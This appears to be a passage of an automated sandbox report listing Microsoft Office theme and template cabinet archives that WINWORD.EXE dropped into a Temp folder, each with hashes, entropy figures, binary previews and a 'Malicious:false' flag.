                                        Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                        C:\Users\user\AppData\Local\Temp\cab887F.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22340
                                        Entropy (8bit):7.668619892503165
                                        Encrypted:false
                                        SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                        MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                        SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                        SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                        SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                        Malicious:false
                                        Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                        C:\Users\user\AppData\Local\Temp\cab8880.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22008
                                        Entropy (8bit):7.662386258803613
                                        Encrypted:false
                                        SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                        MD5:ABBF10CEE9480E41D81277E9538F98CB
                                        SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                        SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                        SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                        Malicious:false
                                        Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                        C:\Users\user\AppData\Local\Temp\cab8881.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31471
                                        Entropy (8bit):7.818389271364328
                                        Encrypted:false
                                        SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                        MD5:91AADBEC4171CFA8292B618492F5EF34
                                        SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                        SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                        SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                        Malicious:false
                                        Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                        C:\Users\user\AppData\Local\Temp\cab8893.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):46413
                                        Entropy (8bit):7.9071408623961394
                                        Encrypted:false
                                        SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                        MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                        SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                        SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                        SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                        Malicious:false
                                        Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                        C:\Users\user\AppData\Local\Temp\cab8CCE.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):271273
                                        Entropy (8bit):7.995547668305345
                                        Encrypted:true
                                        SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                        MD5:21437897C9B88AC2CB2BB2FEF922D191
                                        SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                        SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                        SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                        Malicious:false
                                        Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                        C:\Users\user\AppData\Local\Temp\cab8CDF.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):276650
                                        Entropy (8bit):7.995561338730199
                                        Encrypted:true
                                        SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                        MD5:84D8F3848E7424CBE3801F9570E05018
                                        SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                        SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                        SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                        Malicious:false
                                        Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                        C:\Users\user\AppData\Local\Temp\cab8CE0.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):230916
                                        Entropy (8bit):7.994759087207758
                                        Encrypted:true
                                        SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                        MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                        SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                        SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                        SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                        Malicious:false
                                        Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                        C:\Users\user\AppData\Local\Temp\cab8CE1.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):42788
                                        Entropy (8bit):7.89307894056
                                        Encrypted:false
                                        SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                        MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                        SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                        SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                        SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                        Malicious:false
                                        Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                        C:\Users\user\AppData\Local\Temp\cab8CE2.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):261258
                                        Entropy (8bit):7.99541965268665
                                        Encrypted:true
                                        SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                        MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                        SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                        SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                        SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                        Malicious:false
                                        Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                        C:\Users\user\AppData\Local\Temp\cab8CE3.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):295527
                                        Entropy (8bit):7.996203550147553
                                        Encrypted:true
                                        SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                        MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                        SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                        SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                        SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                        Malicious:false
                                        Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                        C:\Users\user\AppData\Local\Temp\cab8D06.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):307348
                                        Entropy (8bit):7.996451393909308
                                        Encrypted:true
                                        SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                        MD5:0EBC45AA0E67CC435D0745438371F948
                                        SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                        SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                        SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                        Malicious:false
                                        Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                        C:\Users\user\AppData\Local\Temp\cab8D19.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):550906
                                        Entropy (8bit):7.998289614787931
                                        Encrypted:true
                                        SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                        MD5:1C12315C862A745A647DAD546EB4267E
                                        SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                        SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                        SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                        Malicious:false
                                        Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                        C:\Users\user\AppData\Local\Temp\cab8D29.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):723359
                                        Entropy (8bit):7.997550445816903
                                        Encrypted:true
                                        SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                        MD5:748A53C6BDD5CE97BD54A76C7A334286
                                        SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                        SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                        SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                        Malicious:false
